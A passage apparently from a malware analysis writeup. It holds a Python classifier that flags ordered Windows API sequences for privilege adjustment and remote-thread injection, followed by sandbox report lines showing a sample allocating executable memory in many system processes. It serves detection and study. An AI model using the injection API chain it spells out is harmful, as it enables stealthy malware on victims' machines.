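    "Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe Code function: 0_2_00901EF6 "
    "OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,"
    "GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,"
    "CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,"
    "OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,"
    "GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,"
    "VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,"
    "WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,"
    "0_2_00901EF6",
]

# "Code function: <addr> <api>,<api>,...,<addr>": the function address brackets the chain.
FUNC_RE = re.compile(r"Code function: (\w+) (.*?),?\1$")

# Ordered API sub-sequences (our own small signature table, an assumption, not the
# sandbox's rule set). Order matters: a set-based check would also fire on benign code
# that merely imports these APIs for unrelated purposes.
PATTERNS = {
    "token privilege adjustment": ("OpenProcessToken", "LookupPrivilegeValueA", "AdjustTokenPrivileges"),
    "remote-thread injection": ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"),
    "target owner lookup": ("GetTokenInformation", "LookupAccountSidA", "lstrcmpiA"),
    "import resolution + section re-protect": ("LoadLibraryA", "GetProcAddress", "VirtualProtect"),
}


def count_in_order(calls, pattern):
    """Count non-overlapping occurrences of `pattern` as an ordered sub-sequence of `calls`."""
    count, pos = 0, 0
    while True:
        for api in pattern:
            while pos < len(calls) and calls[pos] != api:
                pos += 1
            if pos == len(calls):
                return count
            pos += 1
        count += 1


def parse_functions(lines):
    """Map each traced function address to its API call list."""
    funcs = {}
    for line in lines:
        m = FUNC_RE.search(line)
        if m:
            funcs[m.group(1)] = m.group(2).split(",")
    return funcs


def classify(lines):
    """Return {address: {pattern name: occurrences}} for every pattern that fires."""
    result = {}
    for addr, calls in parse_functions(lines).items():
        hits = {name: count_in_order(calls, pat) for name, pat in PATTERNS.items()}
        result[addr] = {name: n for name, n in hits.items() if n}
    return result


if __name__ == "__main__":
    for addr, hits in classify(REPORT_LINES).items():
        print(addr, hits or "no pattern matched")
```

Sub-sequence matching is the right granularity for traces like these: the APIs are ordinary and individually common, and it is the order (privilege, then target owner check, then allocate/write/thread) that makes the function an injector.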

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\fontdrvhost.exe base: D30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 830000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\dwm.exe base: 8F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\sihost.exe base: AC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: A50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\explorer.exe base: 11C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\svchost.exe base: D40000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: B50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 110000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: A90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: AB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 290000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 580000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 900000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 180000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 190000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\svchost.exe base: 9F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\dllhost.exe base: A10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\conhost.exe base: C00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 320000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: B10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 840000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: C90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: CA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1290000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 12A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F70000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 13B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 790000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: E50000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 15F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 700000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 710000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 7E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1340000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1390000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1300000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1310000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 690000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 6A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A30000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: FC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F20000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5A0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 800000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 850000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BE0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F80000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: F90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: B60000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A00000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: A10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1050000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1060000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DA0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: DB0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14B0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 14C0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 580000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 590000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 920000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 970000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 520000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 530000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 4F0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 500000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BC0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: BD0000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Memory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 860000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1140000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 1150000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe base: 10A0000 protect: page execute and read and writeJump to behavior
